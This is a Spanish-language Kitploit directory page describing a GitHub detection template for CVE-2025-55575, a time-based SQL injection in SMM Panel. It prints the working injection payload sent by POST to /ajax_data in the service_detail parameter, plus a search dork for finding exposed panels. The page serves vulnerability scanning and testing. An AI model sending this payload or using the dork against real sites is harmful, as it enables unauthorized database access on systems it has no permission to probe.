Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/aether-0/cve-2025-55575
Escáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubaether-0/cve-2025-55575

CVE-2025-55575

Plantilla de detección de inyección SQL basada en tiempo para SMM Panel. Envía solicitudes POST manipuladas a `/ajax_data` e identifica endpoints vulnerables mediante análisis de retardo de respuesta.

Ver Repositorio
hace 0 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

smm-panel-sqli(CVE-2025-55575)

Detección de Inyección SQL basada en tiempo para SMM Panel


Resumen

Esta plantilla detecta una vulnerabilidad de Inyección SQL basada en tiempo en el parámetro service_detail del SMM Panel a través de solicitudes HTTP POST a /ajax_data. La explotación puede permitir a atacantes remotos acceder a datos sensibles o escalar privilegios.

  • Autor: Aether
  • Severidad: Crítica
  • Etiquetas: sqli, mysql, timing, dork:'intitle:"#1 SMM Panel ****"' "smm panel"
  • Referencia: https://owasp.org/www-community/attacks/SQL_Injection

Lógica de Detección

La herramienta envía una solicitud POST manipulada:

root@kitploit:~
POST /ajax_data
Content-Type: application/x-www-form-urlencoded

action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z

Si el tiempo de respuesta es mayor a 5 segundos, indica un endpoint vulnerable.

Ejemplo de Detección

root@kitploit:~
- Método: POST
- Ruta: {{BaseURL}}/ajax_data
- Encabezados: Content-Type: application/x-www-form-urlencoded
- Cuerpo: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Comparador: duración > 5 segundos

Demostración en Video

SQLi PoC


Descargar herramienta